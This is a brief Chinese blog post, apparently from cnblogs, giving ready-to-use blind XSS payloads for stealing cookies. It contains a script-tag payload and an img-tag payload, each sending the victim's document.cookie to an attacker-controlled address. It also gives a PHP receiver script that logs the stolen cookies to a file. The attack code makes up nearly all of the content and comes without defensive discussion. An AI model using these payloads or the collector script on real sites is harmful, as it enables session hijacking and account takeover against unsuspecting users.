XSS打cookie

盲打cookie payload

<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script>

<img src='http://192.168.0.176/Hcookie.php?cookie='+document.cookie>

服务器

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>

posted @ 2023-02-26 21:55 幻-心阅读(22) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· DNSlog

· CRLF注入

· 反射XSS——构造payload

· xss利用之盗取cookie示例

· 利用XSS漏洞获取cookie

阅读排行：
· 无需6万激活码！GitHub神秘组织3小时极速复刻Manus，手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· 一文读懂知识蒸馏
· Manus爆火，是硬核还是营销？
· 终于写完轮子一部分：tcp代理了，记录一下

公告

昵称：幻-心
园龄： 2年
粉丝： 0
关注： 0

+加关注

2025年3月

日

一

二

三

四

五

六

幻心

我是废物

XSS打cookie

公告

搜索

常用链接

随笔分类

随笔档案

阅读排行榜